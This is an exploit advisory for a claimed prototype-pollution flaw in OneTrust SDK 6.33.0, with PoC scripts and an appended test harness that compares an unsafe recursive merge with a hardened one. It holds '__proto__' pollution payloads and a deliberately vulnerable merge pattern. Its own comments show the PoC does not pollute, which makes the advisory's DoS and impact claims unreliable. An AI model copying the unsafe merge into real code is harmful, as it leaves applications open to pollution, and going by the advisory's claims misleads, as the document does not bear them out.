- **Exploit Title**: OneTrust SDK 6.33.0 - Denial Of Service (DoS)
- **Date**: 01/01/2025
- **Exploit Author**: Alameen Karim Merali
- **Vendor Homepage**: [OneTrust JavaScript API](https://developer.onetrust.com/onetrust/docs/javascript-api)
- **Software Link**: [otBannerSdk.js v6.33.0](https://discord.com/assets/oneTrust/v4/scripttemplates/6.33.0/otBannerSdk.js)
- **Version**: 6.33.0
- **Tested on**: Kali Linux
- **CVE ID**: CVE-2024-57708

## Vulnerability Summary

A vulnerability is reported in **OneTrust SDK v6.33.0** that would allow an attacker to perform **Prototype Pollution** via the use of `Object.setPrototypeOf` and `Object.assign`. An attacker who can inject properties into the prototype chain could cause a **Denial of Service (DoS)** or alter the behaviour of every object that inherits from `Object.prototype` throughout the application.

## Technical Details

The affected code includes prototype assignment logic such as:

```javascript
var o = function(e, t) {
  return (o = Object.setPrototypeOf || { __proto__: [] } instanceof ...);
};
```

This is the shape of the `__extends` helper that TypeScript emits into bundles: it sets the prototype of `e` to `t`, falling back to `e.__proto__ = t` or a shallow own-property copy where `Object.setPrototypeOf` is unavailable. The concern is that if the `t` argument (a user-supplied object) contains a `__proto__` or `constructor.prototype` reference, `Object.prototype` could be polluted globally.

Two points a tester should keep in mind when verifying this. `Object.setPrototypeOf(e, t)` only replaces the prototype of `e`; it never writes to `Object.prototype`, and calling it with `Object.prototype` as the target throws. `Object.assign(target, t)` copies own enumerable properties, and a `__proto__` key in an object literal is not an own property (it sets the literal's prototype), so `Object.assign({}, { "__proto__": { ... } })` copies nothing; even with an own `"__proto__"` key (as produced by `JSON.parse`), the assignment goes through the `__proto__` setter and changes the prototype of `target` only. Global pollution requires a recursive merge that walks `target[key]` into `Object.prototype`, so the finding should be confirmed against the SDK's actual merge routine rather than against these two primitives alone.
## Proof-of-Concept (PoC)

```javascript
// `o` is internal to the SDK bundle and not reachable from a stand-alone script,
// so the PoC binds it to the branch the quoted helper takes in every modern
// engine: Object.setPrototypeOf (assumption made for this script).
var o = Object.setPrototypeOf;

function testPrototypePollution() {
  const maliciousPayload = { "__proto__": { polluted: "yes" } };

  // Using the helper 'o': sets the prototype of the fresh {} to maliciousPayload.
  try {
    o({}, maliciousPayload);
    console.log("After o:", {}.polluted); // undefined: Object.prototype is not modified
  } catch (e) {
    console.error("Error testing o:", e);
  }

  // Using Object.assign: copies own enumerable properties only, and a "__proto__"
  // key in an object literal is not an own property, so nothing is copied.
  try {
    Object.assign({}, maliciousPayload);
    console.log("After Object.assign:", {}.polluted); // undefined
  } catch (e) {
    console.error("Error testing Object.assign:", e);
  }

  // Cleanup (a no-op unless a polluting merge ran before this)
  delete Object.prototype.polluted;
}

testPrototypePollution();
```

## Browser Console PoC (DevTools)

```javascript
var maliciousObj = { __proto__: { hacked: true } };
var newObj = Object.create(maliciousObj);
// true, but only through newObj's own chain (Object.create(maliciousObj));
// this is ordinary inheritance, not pollution: ({}).hacked is still undefined.
console.log(newObj.hacked); // true
```

Screenshot: [PoC Screenshot](https://ibb.co/B2hyYr5v)

## Steps to Reproduce

1. Save the PoC script above as `exploit.js`
2. Run using Node.js: `node exploit.js`
3. Check the logged value of `{}.polluted`: a real pollution of `Object.prototype` would print `"yes"`, whereas these two calls leave `Object.prototype` untouched and print `undefined`
4. Alternatively, run the payload in browser DevTools

## Impact

- Global object pollution
- Application logic errors
- Potential DoS
- Further exploitation depending on context

## Recommendation

Developers should upgrade to a patched version and reject or strip `__proto__`, `constructor` and `prototype` keys from any user-supplied input before it reaches object-merging or prototype-manipulation code.
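Added example, not part of the advisory or of the OneTrust SDK: a probe harness that applies the advisory's payload to the two primitives named under Technical Details (`Object.setPrototypeOf`, through a copy of the TypeScript `__extends` helper, and `Object.assign`) and reports whether `Object.prototype` actually picked up the marker property, next to a hypothetical recursive merge that does pollute and the hardened merge the Recommendation calls for. `unsafeDeepMerge`, `safeDeepMerge` and `pollutes` are stand-ins written for this example, not routines from the SDK; the payloads are constructed inline.

```javascript
// Added example (not from the advisory or the OneTrust SDK). Hypothetical
// merge routines and a probe that checks whether Object.prototype was touched.

// TypeScript's __extends helper as emitted into bundles (the `o` quoted above).
var extendStatics = function (d, b) {
  extendStatics = Object.setPrototypeOf ||
    ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) ||
    function (d, b) { for (var p in b) if (Object.prototype.hasOwnProperty.call(b, p)) d[p] = b[p]; };
  return extendStatics(d, b);
};

// Hypothetical vulnerable merge: it walks target[key], so target["__proto__"]
// resolves to Object.prototype and the nested assignment lands there.
function unsafeDeepMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (source[key] && typeof source[key] === "object") {
      if (!target[key] || typeof target[key] !== "object") target[key] = {};
      unsafeDeepMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Hardened variant: refuses prototype-reaching keys and only recurses into
// properties the target actually owns.
const BLOCKED_KEYS = new Set(["__proto__", "constructor", "prototype"]);
function safeDeepMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const value = source[key];
    if (value && typeof value === "object" && !Array.isArray(value)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || typeof target[key] !== "object") {
        target[key] = {};
      }
      safeDeepMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Runs fn(target, payload) and reports whether Object.prototype gained `marker`
// as an own property. Cleans up so one probe cannot skew the next.
function pollutes(fn, payload, marker) {
  const target = {};
  try { fn(target, payload); } catch (e) { /* a throwing merge cannot have polluted */ }
  const hit = Object.prototype.hasOwnProperty.call(Object.prototype, marker);
  delete Object.prototype[marker];
  return hit;
}

function runProbes() {
  // Constructed payloads. JSON.parse is used on purpose: an object literal with a
  // `__proto__` key sets the literal's prototype, whereas JSON.parse creates an own
  // property literally named "__proto__", which is what a merge routine sees.
  const literalPayload = { "__proto__": { polluted: "yes" } };
  const jsonPayload = JSON.parse('{"__proto__": {"polluted": "yes"}}');

  return {
    // The advisory's two primitives, with the advisory's literal payload.
    setPrototypeOf: pollutes(extendStatics, literalPayload, "polluted"),
    objectAssign: pollutes((t, s) => Object.assign(t, s), literalPayload, "polluted"),
    // Object.assign with an own "__proto__" key only swaps the target's prototype.
    objectAssignJson: pollutes((t, s) => Object.assign(t, s), jsonPayload, "polluted"),
    // What actual pollution looks like, and the fix.
    unsafeMerge: pollutes(unsafeDeepMerge, jsonPayload, "polluted"),
    safeMerge: pollutes(safeDeepMerge, jsonPayload, "polluted"),
  };
}

console.log(runProbes());
```

Run it with `node`; only `unsafeMerge` reports `true`. The harness checks `Object.prototype` with `hasOwnProperty` rather than reading `{}.polluted` off a fresh object so that a prototype swap on the merge target (what `Object.assign` with an own `"__proto__"` key does) cannot be mistaken for global pollution. To test the real SDK, point `pollutes` at the bundle's own merge routine instead of the stand-ins.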